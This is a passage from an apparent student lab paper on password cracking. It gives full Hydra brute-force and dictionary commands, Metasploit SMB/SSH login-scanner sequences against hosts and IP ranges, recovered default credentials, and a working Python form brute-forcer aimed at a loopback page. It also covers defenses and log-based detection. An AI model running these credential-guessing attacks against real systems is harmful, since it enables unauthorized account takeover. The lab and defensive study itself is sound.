For the brute force attack the Hydra syntax is as follows (an in-environment example is appendix figure 6): hydra -t 1 -V -l admin -x '8:8:Aa1"@#$!(_)+`~?:%^&*.\' 10.0.20.1 http-post-form '/index.php:username=^USER^&password=^PASS^:incorrect'. This attack targets the 10.0.20.1 firewall, specifically the web GUI it serves on port 80. The first part is the same as before, with the addition of -t for the number of parallel tasks and -V for verbose output. The -x option replaces the wordlist with generated passwords: 8:8 sets the minimum and maximum length, and the string after the second colon defines the character set, where A, a and 1 stand for the upper case letters, lower case letters and digits respectively and every other character is taken literally. The last part is the most important and the trickiest, because it requires knowing how the targeted page handles a login: the http-post-form module takes the form's URL, the POST body with ^USER^ and ^PASS^ marking where the credentials are substituted, and a string that appears in the response only when the login fails. In this case it was fairly simple, since the firewall's login page at 10.0.20.1/index.php handles the submission as outlined in the command. Such a command needs a tremendous amount of time and computing power to run to completion, and we let it run for several days.
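The pieces of that http-post-form invocation, as an added example that is not the paper's code and not THC Hydra's: a hydra-style -x MIN:MAX:CHARSET spec, the URL:POSTDATA:FAILSTRING template with ^USER^/^PASS^ substitution, and the failure-string check on each response. The target is a constructed login page served on the loopback interface, with "incorrect" as its constructed failure marker, so the whole thing runs offline.

```python
"""Online brute force of an HTTP login form, in the shape of hydra http-post-form.

Added example; it is not the paper's code and not THC Hydra's. The target is a
constructed loopback login page whose failure response contains 'incorrect';
the credentials VALID and the charset specs used below are constructed too.
Literal colons inside the template are not escaped here, unlike hydra.
"""
import itertools
import string
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote
from urllib.request import Request, urlopen

# --- Constructed target: a minimal login form that answers 'login incorrect' on failure.
VALID = ("admin", "z9x")  # constructed credentials of the fake firewall GUI


class LoginHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        body = b"welcome" if creds == VALID else b"login incorrect"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_target():
    """Serve the fake login page on an ephemeral loopback port; returns the server."""
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# --- Attacker side, mirroring hydra's options.
CLASSES = {"a": string.ascii_lowercase, "A": string.ascii_uppercase, "1": string.digits}


def parse_x(spec):
    """hydra -x 'MIN:MAX:CHARSET': a/A/1 expand to character classes, anything else is literal."""
    lo, hi, chars = spec.split(":", 2)
    charset = "".join(CLASSES.get(c, c) for c in chars)
    return int(lo), int(hi), "".join(dict.fromkeys(charset))  # de-duplicate, keep order


def candidates(spec):
    """Every string of length MIN..MAX over the charset, shortest first."""
    lo, hi, charset = parse_x(spec)
    for n in range(lo, hi + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def try_login(base_url, template, user, password):
    """One attempt. template = 'PATH:POSTDATA:FAILSTRING' as in hydra http-post-form.
    Success means the failure string is absent from the response body."""
    path, data, fail = template.split(":", 2)
    body = data.replace("^USER^", quote(user, safe="")).replace("^PASS^", quote(password, safe=""))
    req = Request(base_url + path, data=body.encode(),
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(req, timeout=5) as resp:
        return fail not in resp.read().decode()


def brute_force(base_url, template, user, spec):
    """Return (password, attempts) for the first candidate that logs in, or (None, attempts)."""
    attempts = 0
    for pw in candidates(spec):
        attempts += 1
        if try_login(base_url, template, user, pw):
            return pw, attempts
    return None, attempts


if __name__ == "__main__":
    srv = start_target()
    base = "http://127.0.0.1:%d" % srv.server_address[1]
    form = "/index.php:username=^USER^&password=^PASS^:incorrect"
    print(brute_force(base, form, "admin", "1:3:xz9"))  # a 39-candidate keyspace
    srv.shutdown()
```

The failure-string check is the fragile part, exactly as the text says: if the page ever answers a correct login with a body that happens to contain the failure string, or a failed login without it (a lockout page, for instance), the scan reports nonsense, so the marker must be verified against one known-good and one known-bad attempt before running the full keyspace.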

Attack Method: Metasploit

Metasploit is an exploitation framework whose scanner modules probe a network for vulnerabilities, chiefly openly available ports and the services behind them. Once the scan is complete, the user can run attacks against what was found to see how effective the existing security controls are and to what extent each weakness can be exploited. Before anything can be exploited, then, the system must first be scanned.

Some ports will of course be found open after the scan, such as 22 (Secure Shell, SSH) and 25 (Simple Mail Transfer Protocol, SMTP), and a few others such as 80 (Hypertext Transfer Protocol), 69 (Trivial File Transfer Protocol, TFTP) and 443 (HTTPS). The point of scanning is to decide which of these should be closed, in our case 22, 69 and 25. Port 22 gives remote command line control, which lets anyone who obtains credentials take over the machine with relative ease; port 69 is unnecessary because no files need to be transferred between these machines; and port 25 can be closed because these machines have no need to send or receive mail, since the users are our team and we communicate outside of them.

Now that the vulnerabilities have been identified the real fun can begin: exploiting them. Since Metasploit is open source, and anyone can contribute to it, the range of attack modules it carries keeps growing. Metasploit organizes these by the exploit itself; we are concerned specifically with passwords, and Metasploit lets you test a network for weak or reused credentials. The Pro edition can also run brute-force attacks against databases and web servers and go on to show the extent of the damage exposed credentials can cause.


Using and Accessing Metasploit

For our research we used Metasploit through the terminal interface of the Kali Linux machine. To access it we had to log out of the admin user and log back in as root. After that we could open Metasploit either from the icon on the sidebar (appendix, figure 7) or by typing msfconsole in the terminal shell:

root@4777KaliC05:~# msfconsole

After this command the shell takes a few moments to load Metasploit and then presents the prompt:

msf >

Once this prompt appears Metasploit is running and its modules are available.

For our password attack we used the auxiliary modules, which perform sniffing, fuzzing, scanning and similar tasks. Within them we used the scanner modules, and specifically the SMB and SSH login scanners. They are loaded with one of the following commands:

msf > use auxiliary/scanner/smb/smb_login

msf > use auxiliary/scanner/ssh/ssh_login

Once one of these commands is entered the prompt changes to show the loaded module:

msf auxiliary(smb_login) >

msf auxiliary(ssh_login) >

This confirmed that the module was loaded; all that remained was to display its options and set the target host, username and password. The options are listed with:

msf auxiliary(smb_login) > show options

msf auxiliary(ssh_login) > show options

The output of this command can be seen in the appendix (figure X); from there we changed only the options relevant to the attack at hand. We first ran the attack against a single machine, which is demonstrated first. We then switched to targeting an IP range with a username file and a password file, each containing multiple lines of candidate usernames and passwords, to show how the attack can be used against many machines whose usernames are not known.

For the single target attack against SMB on port 445, we typed:

msf auxiliary(smb_login) > show options

msf auxiliary(smb_login) > set RHOSTS 192.168.72.49

msf auxiliary(smb_login) > set USERNAME admin

msf auxiliary(smb_login) > set PASSWORD 4777super


These commands set the module's parameters, in this instance to attack the initial setup of the machine 192.168.72.49 with the username admin and the password 4777super. After they were entered we simply typed:

msf auxiliary(smb_login) > exploit

Metasploit then ran the attack and we waited to see whether it succeeded. A failed attempt is reported with [-] and a successful one with [+], as shown in appendix figure 10.

To run the same attack against SSH on port 22, the commands are:

msf auxiliary(ssh_login) > show options

msf auxiliary(ssh_login) > set RHOSTS 192.168.72.49

msf auxiliary(ssh_login) > set USERNAME admin

msf auxiliary(ssh_login) > set PASSWORD 4777super

This module tries port 22, hoping SSH is open, so that we can log in over SSH. The attack was unsuccessful, because the pfSense firewall protecting the machines on the network filtered the connection.

Having covered single target attacks, we move on to where Metasploit really shines: attacking a range of machines with a username list and a password list. This is extremely effective because one command covers every machine on the network instead of attacking each individually. The module tries the first username with every password in the list, then moves to the next username and repeats, for each successive username.

To implement this attack we first needed to unpack the wordlist pre-installed at /usr/share/wordlists/rockyou.txt.gz, which we did from the terminal with:

root@4777KaliC05:~# gunzip /usr/share/wordlists/rockyou.txt.gz

With the file unpacked, rockyou.txt was available. We then ran the following series of commands to execute the attack:

msf > use auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > show options

msf auxiliary(smb_login) > set RHOSTS 192.168.72.12-57

msf auxiliary(smb_login) > set USER_FILE /usr/share/wordlists/username.txt

msf auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/password_list.txt

We set RHOSTS to cover the machines in the range 192.168.72.12 through 192.168.72.57. After looking at the allotted addresses, the class machines occupied .12 through .56 and our own team's machines .57 through .82, with the rest unused, so there was no reason to attack addresses outside that range. The results of these attacks are given at the end of the Brute Force and Dictionary Results section below.

Brute Force and Dictionary Results

As mentioned, our first step in any online attack was to scan the networks for machines vulnerable to the attack we were conducting. From the scans described above we found that on the 192.168.72.0/24 network several machines were left exposed to an attack on SMB. The full list of machines is in appendix figure 5; for this exercise we specifically targeted the Windows machine 192.168.72.54. Next we looked at the results for the 10.0.10.0/24 and 10.0.20.0/24 networks. Scanning them took a long time because the firewalls blocked ping scans originating outside the networks, but we were eventually able to scan the machines on them, and the results were largely the same: multiple Windows machines were running SMB, but all of them were filtered by the 10.0.10.1 or 10.0.20.1 pfSense firewalls deployed by the network administrator.

With our target machine, 192.168.72.54, chosen, we launched the single target dictionary attack. THC Hydra ran for several hours, looping through over 14 million passwords before finding a successful combination: the username was admin and the password was 4777super (appendix, figure 4). This was unexpected, as these were the default credentials for the system. Launching the same attack against several other machines produced no matches, which we attribute to those users having changed their passwords to something more obscure and having changed their login usernames as well. The next step was to try the same method against the firewall web GUI login pages at 10.0.20.1 and 10.0.10.1. After looping through our dictionary we were unsuccessful; again, we believe the network administrators had changed the default credentials to something more secure.

With the single target online dictionary attack complete, we moved on to single target online brute force attacks. We narrowed these to the 10.0.20.1 and 10.0.10.1 firewall web GUI login pages, since they are served over plain HTTP. We began the attack midway through the semester, working through every eight character combination of the character set given above. THC Hydra averaged roughly thirty attempts per second, which is incredibly slow by today's standards of computing power: at that rate, exhausting the 78-character set in our -x specification (about 1.4 × 10^15 combinations) would take well over a million years, and the full 95-character printable set longer still. The attack was therefore unsuccessful and did not recover the passwords used on the firewalls. An online attack against a login page is bounded by the service's response time and connection limits, not by the attacker's hardware, which is the central difference from cracking a stolen hash file offline.

Running the dictionary attack within Metasploit against the range of machines returned a couple of hits. The results are in appendix figure 9, with the successful attempts marked [+] and reported as the username and password combination that worked, in the format "Success: 'WORKSTATION\admin:4777super'". This is extremely helpful given that the password list in use contained 50,000 entries. We also turned off per-attempt output with:

msf auxiliary(smb_login) > set VERBOSE false

This suppressed the output of failed attempts, which avoided a cluttered screen and showed only the successes, making the returned log significantly easier to navigate since we did not have to scroll through thousands of entries. At times, however, it is useful to review the full log of attempts, and Metasploit can also record each attempt in its internal database for later analysis.

Finally, by enabling the STOP_ON_SUCCESS parameter using the command:

msf auxiliary(smb_login) > set STOP_ON_SUCCESS true

This parameter tells the module to finish after the first successful login. Used with a username list it actually harms the attack, since it stops after the first successful pair and never tries the remaining users. With a single username it saves time, since there is only one valid password per account and nothing remains to be found once it is known.

Defense and Detection

Cryptography


The shortcomings of DES, chiefly its 56-bit key, were addressed by 3DES, which runs the cipher three times with two or three independent keys. 3DES is slow, and it keeps DES's 64-bit block size; its effective key strength is 112 bits, which is not a terribly insecure length, but it is far easier to simply increase the key size. DES itself has been broken in practice: a 56-bit key was recovered by purpose-built hardware in 1998 and by a distributed search in 1999. The Advanced Encryption Standard accepts keys of 128, 192 or 256 bits. The biggest vulnerabilities of passwords are human error and cryptanalysis, and cryptographic tools are used by attackers as well as defenders. Fortunately it is much easier to compute a hash than to reverse one, and easier to produce a new hash than to find a second input that reproduces a given hash; the latter is like searching the universe for an exact copy of the planet Earth. The best defenses against an offline dictionary attack are therefore storing passwords with a salted, deliberately slow hash, controls that limit who can read the shadow file, intrusion detection, and assigning new passwords as soon as a compromise is detected. When an attacker is working on a specific account, at Yahoo for example, the best defense is to allow only about five password attempts per session before locking or throttling the account. An attack on a single user is especially threatening because of what the attacker usually knows about the victim, so a strong password policy thwarts most of these attacks: a password built from non-dictionary words, symbols and mixed case is harder to crack, and because it is random it has nothing to do with the victim, even if the attacker knows the victim as well as a family member. Workstation hijacking is also very effective, and automatic logout after a set interval of inactivity protects against it. The popular-password attacker simply tries common passwords against a wide range of user IDs.

To defend against this, common passwords must be prohibited by the password policy, and the administrator should monitor source IP addresses so that one address attempting to log in to many user IDs is noticed. User mistakes will always be a factor, so training employees to recognize common attacks such as phishing is very effective, and employees should be taught never to reuse a password. Against electronic monitoring, where an attacker eavesdrops on the network, the defense is an authenticated, encrypted channel such as TLS. Hashing protects the stored password, not the one in transit: a password hash captured on the wire can simply be replayed by the attacker, which is the basis of pass-the-hash against NTLM, so hashing is a complement to transport encryption, not a substitute for it.

Defenses against Brute Force and Dictionary/Library Attacks

Log Files

The log files on a computer are a relatively simple way to see whether it has been accessed by someone else. On the Windows machine we clicked the Windows button and typed "event logs" into the search bar, which opened the Event Viewer window shown in appendix figure 14. The figure shows the logs of a machine we had broken into; the highlighted entries are the successful logon and logoff made by our password cracking software.

Had these been our own machines, we would have seen that someone other than ourselves had logged in. The logs also record the time of each logon, which is useful for establishing when the system was compromised. Combined with a monitoring platform such as Security Onion, this would let us generate a report to support reporting the incident to superiors or authorities.

Unfortunately, throughout the project we ran into technical difficulties shared by all teams and are unable to provide the Security Onion reporting data. The error could not be resolved even though Security Onion was online and configured to the required specifications. Had we been able to review the logs within Security Onion, we could have examined the system logs for our entire network. All that would have been needed is to filter for a "special logon" or a "logoff" occurring moments after a "logon". This could be done by scouring the logs by hand or by filtering on the event IDs associated with each type: 4672 for special logon (special privileges assigned), 4624 for logon and 4634 for logoff, with 4625 marking the failed logons that a brute force or dictionary run leaves behind in quantity. Filtering this way expedites log review, finding the relevant records faster and with fewer resources.
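The filtering described above carried out in code, as an added example that is not from the paper. The events are constructed to look like what a Hydra or smb_login run leaves in the target's Security log (a burst of 4625 failures from one source, then a 4624 with 4672 and a 4634 a second later), with field names simplified so that every event type carries its logon id under TargetLogonId (Windows records it as SubjectLogonId on 4672).

```python
"""Detection over constructed Windows Security log events.

Added example; it is not from the paper. EVENTS is constructed to mimic what a
credential-guessing run leaves on its target: a burst of 4625 (logon failure)
from one source, then 4624 (logon) with 4672 (special privileges) and an almost
immediate 4634 (logoff). Field names are simplified: the logon id is kept under
TargetLogonId for every event type (Windows uses SubjectLogonId on 4672).
"""
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2016, 3, 1, 10, 0, 0)  # constructed base time


def ev(event_id, seconds, user, ip="-", logon_type=3, logon_id="0x0"):
    """Build one constructed event `seconds` after T0."""
    return {"EventID": event_id, "TimeCreated": T0 + timedelta(seconds=seconds),
            "TargetUserName": user, "IpAddress": ip,
            "LogonType": logon_type, "TargetLogonId": logon_id}


EVENTS = (
    [ev(4625, i, "admin", "192.168.72.44") for i in range(12)]             # 12 failures in 12 s
    + [ev(4624, 12, "admin", "192.168.72.44", logon_id="0x3e7a1"),        # then a success
       ev(4672, 12, "admin", logon_id="0x3e7a1"),                         # with admin privileges
       ev(4634, 13, "admin", logon_id="0x3e7a1"),                         # scanner logs off at once
       ev(4624, 600, "yi", "192.168.72.20", logon_type=2, logon_id="0x5001"),  # ordinary console logon
       ev(4634, 4200, "yi", logon_id="0x5001")]                           # logoff an hour later
)


def by_time(events):
    return sorted(events, key=lambda e: e["TimeCreated"])


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag a source once it reaches `threshold` 4625s inside `window`, and again if a
    4624 from the same source follows: the signature of a guess that landed."""
    alerts, failures = [], defaultdict(list)
    for e in by_time(events):
        ip = e["IpAddress"]
        if e["EventID"] == 4625:
            recent = [t for t in failures[ip] if e["TimeCreated"] - t <= window]
            recent.append(e["TimeCreated"])
            failures[ip] = recent
            if len(recent) == threshold:
                alerts.append(("bruteforce", ip, e["TargetUserName"]))
        elif e["EventID"] == 4624 and len(failures[ip]) >= threshold:
            alerts.append(("bruteforce-success", ip, e["TargetUserName"]))
            failures[ip] = []
    return alerts


def detect_short_sessions(events, max_len=timedelta(seconds=30)):
    """4624 followed by 4634 for the same logon id within max_len: the logon/logoff pair
    a cracking tool leaves when it only verifies credentials and does nothing else."""
    opened, short = {}, []
    for e in by_time(events):
        lid = e["TargetLogonId"]
        if e["EventID"] == 4624:
            opened[lid] = e
        elif e["EventID"] == 4634 and lid in opened:
            start = opened.pop(lid)
            duration = e["TimeCreated"] - start["TimeCreated"]
            if duration <= max_len:
                short.append((start["TargetUserName"], start["IpAddress"],
                              int(duration.total_seconds())))
    return short


def privileged_network_logons(events):
    """Logon ids that received 4672 after a network (type 3) 4624: remote administrative access."""
    network = {e["TargetLogonId"] for e in events
               if e["EventID"] == 4624 and e["LogonType"] == 3}
    return {e["TargetLogonId"] for e in events
            if e["EventID"] == 4672 and e["TargetLogonId"] in network}


if __name__ == "__main__":
    print(detect_bruteforce(EVENTS))          # brute force from .44, then its success
    print(detect_short_sessions(EVENTS))      # admin's one-second session; yi's hour is normal
    print(privileged_network_logons(EVENTS))  # the logon id that got admin rights over the network
```

The three checks are independent on purpose. The failure burst alone catches an unsuccessful run, the short session alone catches a success whose failures were never logged or were logged elsewhere, and the privileged network logon flags the case that matters most even when the other two miss. The five-failure threshold is the same figure the cryptography section gives for account lockout.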


Conclusion and Future Implications

Because passwords are the universal default form of authentication, they are the most popular target for attackers. In this paper we have discussed several incidents in which attackers stole passwords, and reported our findings from running similar attacks in our test environment. We found that conducting these attacks is relatively easy, though time consuming and largely dependent on the hardware and network in use. This is frightening, and it confirms that the threat to people's passwords is very real. We therefore suggest that individuals adopt a password of at least eight characters made up of symbols, upper and lower case letters and digits. A user who takes this to heart the next time a password is created will be relatively safe from dictionary attacks. The threat of brute force remains, but against an online login of the kind we tested it is unlikely to succeed without computing resources far beyond a home machine.

While working on this paper we faced a time constraint on setting up our systems and executing the attack methods. We also had to conduct the attacks in an environment that does not accurately reflect a real-life scenario. In the future we would like to carry out this research over the course of a year, in an environment that better represents how a large network of users creates and handles passwords. That would produce better results and, ideally, more successful password cracking attempts.


Appendix:

Figure 1

Figure 2

Figure 3


Figure 4

Figure 5


Figure 6

Figure 7


Figure 8

Figure 9

Figure 10


Figure 11


Figure 12


Figure 13

Success into Yi’s machine


Figure 14

Yi’s Logs


Figure 15

Targeting range of IP addresses


Figure 16

Using password list


Figure 17

Running Metasploit


Figure 18

Access to Sean’s Machine


Figure 19

File location


Figure 20

Files Inside

Figure 21

Command to Execute


References

British Airways among latest breaches. (2015). Network Security, 2015(4), 2-20.

Ganesan, R. (2016). Stepping up security with password management control. Network Security, 2016(2), 18-19.

Goodin, D. (2016, February 15). Password cracking attacks on Bitcoin wallets net £71,000. Retrieved February 25, 2016, from http://arstechnica.co.uk/security/2016/02/password-cracking-attacks-on-bitcoin-wallets-net-103000/

"John the Ripper" open source password cracker offers increased speed through 17 percent improvement in gate count for Data Encryption Standard (DES) algorithm. (2011). Benzinga.com.

Mansfield-Devine, S. (2015). The Ashley Madison affair. Network Security, 2015(9), 8-16. Retrieved February 24, 2016.

More battles over encryption & surveillance. (2016). Network Security, 2016(1),

Sykes, E. R., Lin, M., & Skoczen, W. (2010). MPI enhancements in John the Ripper. Journal of Physics: Conference Series, 256, 012024.
